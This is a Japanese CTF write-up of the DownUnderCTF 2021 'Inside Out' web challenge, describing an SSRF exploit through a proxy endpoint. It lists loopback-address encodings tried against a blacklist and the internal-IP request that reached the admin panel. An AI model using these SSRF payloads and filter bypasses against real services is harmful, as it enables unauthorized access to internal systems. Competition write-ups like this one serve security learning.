URL https://web-inside-out-b3d9f3b9.chal-2021.duc.tf/ が与えられた。
アクセスしてみると、Proxy Example のリンクがあり、クエリストリングでURLを指定出来るようだった。
また、ソースを表示すると、以下の部分があった。
<!-- <a href="/admin">Admin Panel</a> -->
https://web-inside-out-b3d9f3b9.chal-2021.duc.tf/admin
にアクセスしてみると、
Forbidden
Only accessible from the local network
と表示された。
Proxy Example のリンクを用い、
https://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=http://web-inside-out-b3d9f3b9.chal-2021.duc.tf/admin
にアクセスしてみると、status: "failed" と表示された。
さらに、以下のURLへのアクセスを試した。
https://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=https://localhost/adminhttps://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=https://127.0.0.1/adminhttps://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=https://0x7f000001/adminhttps://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=https://017700000001/adminhttps://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=https://127.1/adminhttps://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=https://2130706433/adminhttps://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=https://127.127.127.127/adminhttps://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=https://2139062143/admin結果は全て以下のようになった。
Blacklisted
Loopback address is not allowed
なお、一部のURLはこのページを参考にした。
127.0.0.1(localhost)を一番面白く表記できた奴が優勝 - Qiita
ここで、最初の Proxy Example のリンク先に、
inet 10.96.0.167/32 brd 10.96.0.167 scope global eth0
と出ていたのを思い出した。
https://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=https://10.96.0.167/admin
にアクセスすると、
status: "failed"
と表示された。
https://web-inside-out-b3d9f3b9.chal-2021.duc.tf/request?url=http://10.96.0.167/admin
にアクセスすると、flagが表示された。
writeup by MikeCAT